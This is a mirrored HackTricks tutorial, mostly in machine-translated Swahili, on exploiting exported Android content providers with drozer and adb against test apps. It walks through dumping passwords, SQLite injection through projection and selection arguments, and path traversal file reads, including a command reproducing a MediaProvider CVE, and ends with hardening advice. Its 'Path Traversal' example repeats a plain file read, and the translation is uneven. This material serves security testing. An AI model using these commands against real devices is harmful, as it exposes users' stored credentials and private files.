mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
235 lines
11 KiB
Markdown
235 lines
11 KiB
Markdown
# Exploiting Content Providers
|
||
|
||
{{#include ../../../banners/hacktricks-training.md}}
|
||
|
||
## Intro
|
||
|
||
Data inapatikana **kutoka kwa programu moja hadi nyingine** kwa ombi la kipengele kinachojulikana kama **content provider**. Maombi haya yanadhibitiwa kupitia mbinu za **ContentResolver class**. Watoa maudhui wanaweza kuhifadhi data zao katika maeneo mbalimbali, kama vile **database**, **files**, au kupitia **network**.
|
||
|
||
Katika faili ya _Manifest.xml_, tangazo la mtoa maudhui linahitajika. Kwa mfano:
|
||
```xml
|
||
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
|
||
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
|
||
</provider>
|
||
```
|
||
Ili kufikia `content://com.mwr.example.sieve.DBContentProvider/Keys`, ruhusa ya `READ_KEYS` inahitajika. Ni ya kuvutia kutaja kwamba njia `/Keys/` inapatikana katika sehemu ifuatayo, ambayo haijalindwa kutokana na makosa ya mende, ambaye alilinda `/Keys` lakini alitangaza `/Keys/`.
|
||
|
||
**Labda unaweza kufikia data za kibinafsi au kutumia udhaifu fulani (SQL Injection au Path Traversal).**
|
||
|
||
## Pata taarifa kutoka **watoa maudhui walio wazi**
|
||
```
|
||
dz> run app.provider.info -a com.mwr.example.sieve
|
||
Package: com.mwr.example.sieve
|
||
Authority: com.mwr.example.sieve.DBContentProvider
|
||
Read Permission: null
|
||
Write Permission: null
|
||
Content Provider: com.mwr.example.sieve.DBContentProvider
|
||
Multiprocess Allowed: True
|
||
Grant Uri Permissions: False
|
||
Path Permissions:
|
||
Path: /Keys
|
||
Type: PATTERN_LITERAL
|
||
Read Permission: com.mwr.example.sieve.READ_KEYS
|
||
Write Permission: com.mwr.example.sieve.WRITE_KEYS
|
||
Authority: com.mwr.example.sieve.FileBackupProvider
|
||
Read Permission: null
|
||
Write Permission: null
|
||
Content Provider: com.mwr.example.sieve.FileBackupProvider
|
||
Multiprocess Allowed: True
|
||
Grant Uri Permissions: False
|
||
```
|
||
Inawezekana kuunganisha jinsi ya kufikia **DBContentProvider** kwa kuanza URIs na “_content://_”. Njia hii inategemea maarifa yaliyopatikana kutoka kwa kutumia Drozer, ambapo taarifa muhimu zilipatikana katika _/Keys_ directory.
|
||
|
||
Drozer inaweza **kukisia na kujaribu URIs kadhaa**:
|
||
```
|
||
dz> run scanner.provider.finduris -a com.mwr.example.sieve
|
||
Scanning com.mwr.example.sieve...
|
||
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
|
||
...
|
||
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
|
||
Accessible content URIs:
|
||
content://com.mwr.example.sieve.DBContentProvider/Keys/
|
||
content://com.mwr.example.sieve.DBContentProvider/Passwords
|
||
content://com.mwr.example.sieve.DBContentProvider/Passwords/
|
||
```
|
||
Unapaswa pia kuangalia **ContentProvider code** kutafuta maswali:
|
||
|
||
 (1) (1) (1).png>)
|
||
|
||
Pia, ikiwa huwezi kupata maswali kamili unaweza **kuangalia ni majina gani yamewekwa na ContentProvider** kwenye njia ya `onCreate`:
|
||
|
||
.png>)
|
||
|
||
Swali litakuwa kama: `content://name.of.package.class/declared_name`
|
||
|
||
## **Watoa Maudhui Wanaoungwa Mkono na Database**
|
||
|
||
Labda wengi wa Watoa Maudhui wanatumika kama **kiunganishi** kwa **database**. Hivyo, ikiwa unaweza kuifikia unaweza kuwa na uwezo wa **kutoa, kusasisha, kuingiza na kufuta** taarifa.\
|
||
Angalia ikiwa unaweza **kufikia taarifa nyeti** au jaribu kubadilisha ili **kupita mifumo ya idhini**.
|
||
|
||
Unapokagua msimbo wa Watoa Maudhui **angalia** pia kwa **kazi** zenye majina kama: _query, insert, update na delete_:
|
||
|
||
.png>)
|
||
|
||
 (1) (1) (1) (1) (1) (1) (1).png>)
|
||
|
||
Kwa sababu utaweza kuziita
|
||
|
||
### Uliza maudhui
|
||
```
|
||
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
|
||
_id: 1
|
||
service: Email
|
||
username: incognitoguy50
|
||
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
|
||
-
|
||
email: incognitoguy50@gmail.com
|
||
```
|
||
### Insert content
|
||
|
||
Quering the database you will learn the **jina la safu**, then, you could be able to insert data in the DB:
|
||
|
||
.png>)
|
||
|
||
.png>)
|
||
|
||
_Note that in insert and update you can use --string to indicate string, --double to indicate a double, --float, --integer, --long, --short, --boolean_
|
||
|
||
### Update content
|
||
|
||
Knowing the name of the columns you could also **badilisha entries**:
|
||
|
||
.png>)
|
||
|
||
### Delete content
|
||
|
||
.png>)
|
||
|
||
### **SQL Injection**
|
||
|
||
It is simple to test for SQL injection **(SQLite)** by manipulating the **projection** and **selection fields** that are passed to the content provider.\
|
||
When quering the Content Provider there are 2 interesting arguments to search for information: _--selection_ and _--projection_:
|
||
|
||
.png>)
|
||
|
||
You can try to **abuse** this **parameters** to test for **SQL injections**:
|
||
```
|
||
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
|
||
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
|
||
```
|
||
|
||
```
|
||
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
|
||
FROM SQLITE_MASTER WHERE type='table';--"
|
||
| type | name | tbl_name | rootpage | sql |
|
||
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
|
||
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
|
||
```
|
||
**Ugunduzi wa SQLInjection wa kiotomatiki na Drozer**
|
||
```
|
||
dz> run scanner.provider.injection -a com.mwr.example.sieve
|
||
Scanning com.mwr.example.sieve...
|
||
Injection in Projection:
|
||
content://com.mwr.example.sieve.DBContentProvider/Keys/
|
||
content://com.mwr.example.sieve.DBContentProvider/Passwords
|
||
content://com.mwr.example.sieve.DBContentProvider/Passwords/
|
||
Injection in Selection:
|
||
content://com.mwr.example.sieve.DBContentProvider/Keys/
|
||
content://com.mwr.example.sieve.DBContentProvider/Passwords
|
||
content://com.mwr.example.sieve.DBContentProvider/Passwords/
|
||
|
||
dz> run scanner.provider.sqltables -a jakhar.aseem.diva
|
||
Scanning jakhar.aseem.diva...
|
||
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
|
||
android_metadata
|
||
notes
|
||
sqlite_sequence
|
||
```
|
||
## **Watoa Maudhui Wanaoungwa Mkono na Mfumo wa Faili**
|
||
|
||
Watoa maudhui wanaweza pia kutumika **kufikia faili:**
|
||
|
||
.png>)
|
||
|
||
### Soma **faili**
|
||
|
||
Unaweza kusoma faili kutoka kwa Mtoa Maudhui
|
||
```
|
||
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
|
||
127.0.0.1 localhost
|
||
```
|
||
### **Path Traversal**
|
||
|
||
Ikiwa unaweza kufikia faili, unaweza kujaribu kutumia Path Traversal (katika kesi hii hii si lazima lakini unaweza kujaribu kutumia "_../_" na hila zinazofanana).
|
||
```
|
||
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
|
||
127.0.0.1 localhost
|
||
```
|
||
**Ugunduzi wa Safari wa Kiotomatiki na Drozer**
|
||
```
|
||
dz> run scanner.provider.traversal -a com.mwr.example.sieve
|
||
Scanning com.mwr.example.sieve...
|
||
Vulnerable Providers:
|
||
content://com.mwr.example.sieve.FileBackupProvider/
|
||
content://com.mwr.example.sieve.FileBackupProvider
|
||
```
|
||
## 2023-2025 Updates & Modern Tips
|
||
|
||
### Drozer 3.x (Python 3) is out
|
||
|
||
WithSecure ilianza matengenezo ya drozer mnamo 2022 na kuhamasisha mfumo huo kwa **Python 3** (ya hivi punde **3.1.0 – Aprili 2024**).
|
||
Mbali na marekebisho ya ulinganifu, moduli mpya ambazo ni muhimu hasa unapofanya kazi na Content Providers ni pamoja na:
|
||
|
||
* `scanner.provider.exported` – orodhesha tu watoa huduma wenye `android:exported="true"`.
|
||
* `app.provider.grant` – piga simu kiotomatiki `grantUriPermission()` ili uweze kuzungumza na watoa huduma wanaotarajia `FLAG_GRANT_READ_URI_PERMISSION` / `FLAG_GRANT_WRITE_URI_PERMISSION` kwenye Android 12+.
|
||
* Usimamizi bora wa **Scoped Storage** ili watoa huduma wa msingi wa faili kwenye Android 11+ bado wanaweza kufikiwa.
|
||
|
||
Upgrade (host & agent):
|
||
```bash
|
||
pipx install --force "git+https://github.com/WithSecureLabs/drozer@v3.1.0"
|
||
adb install drozer-agent-3.1.0.apk
|
||
```
|
||
### Kutumia msaidizi wa `cmd content` uliojengwa (ADB ≥ 8.0)
|
||
|
||
Vifaa vyote vya kisasa vya Android vinakuja na CLI inayoweza kuuliza/kusasisha watoa huduma **bila kusanidi wakala wowote**:
|
||
```bash
|
||
adb shell cmd content query --uri content://com.test.provider/items/
|
||
adb shell cmd content update --uri content://com.test.provider/items/1 \
|
||
--bind price:d:1337
|
||
adb shell cmd content call --uri content://com.test.provider \
|
||
--method evilMethod --arg 'foo'
|
||
```
|
||
Combine na `run-as <pkg>` au shell iliyo na mizizi ili kujaribu watoa huduma za ndani pekee.
|
||
|
||
### CVE za hivi karibuni za kweli ambazo zilitumia Watoa Huduma
|
||
|
||
| CVE | Mwaka | Kipengele | Aina ya hitilafu | Athari |
|
||
|-----|------|-----------|------------------|--------|
|
||
| CVE-2024-43089 | 2024 | MediaProvider | Safari ya njia katika `openFile()` | Kusoma faili bila kikomo kutoka hifadhi ya faragha ya programu yoyote |
|
||
| CVE-2023-35670 | 2023 | MediaProvider | Safari ya njia | Ufunuo wa taarifa |
|
||
|
||
Re-create CVE-2024-43089 kwenye toleo lenye udhaifu:
|
||
```bash
|
||
adb shell cmd content read \
|
||
--uri content://media/external_primary/file/../../data/data/com.target/shared_prefs/foo.xml
|
||
```
|
||
### Orodha ya kuimarisha kwa API 30+
|
||
|
||
* Tangaza `android:exported="false"` isipokuwa mtoa huduma **lazima** iwe ya umma – kuanzia API 31 sifa hii ni ya lazima.
|
||
* Lazimisha **idhini** na/au `android:grantUriPermissions="true"` badala ya kusambaza mtoa huduma mzima.
|
||
* Weka orodha ya `projection`, `selection` na `sortOrder` zinazoruhusiwa (mfano, jenga maswali na `SQLiteQueryBuilder.setProjectionMap`).
|
||
* Katika `openFile()` fanya njia iliyotolewa kuwa sahihi (`FileUtils`) na kataa mfuatano wa `..` ili kuzuia kupita.
|
||
* Unapofichua faili, pendelea **Storage Access Framework** au `FileProvider`.
|
||
|
||
Mabadiliko haya katika toleo jipya la Android yanamaanisha kuwa mbinu nyingi za zamani za unyakuzi bado zinafanya kazi, lakini zinahitaji bendera/idhini za ziada ambazo moduli za drozer zilizosasishwa au msaidizi wa `cmd content` zinaweza kutekeleza kiotomatiki.
|
||
|
||
## Marejeo
|
||
|
||
- [https://www.tutorialspoint.com/android/android_content_providers.htm](https://www.tutorialspoint.com/android/android_content_providers.htm)
|
||
- [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/)
|
||
- [https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)
|
||
- [https://github.com/WithSecureLabs/drozer/releases/tag/3.1.0](https://github.com/WithSecureLabs/drozer/releases/tag/3.1.0)
|
||
- [https://source.android.com/security/bulletin/2024-07-01](https://source.android.com/security/bulletin/2024-07-01)
|
||
|
||
{{#include ../../../banners/hacktricks-training.md}}
|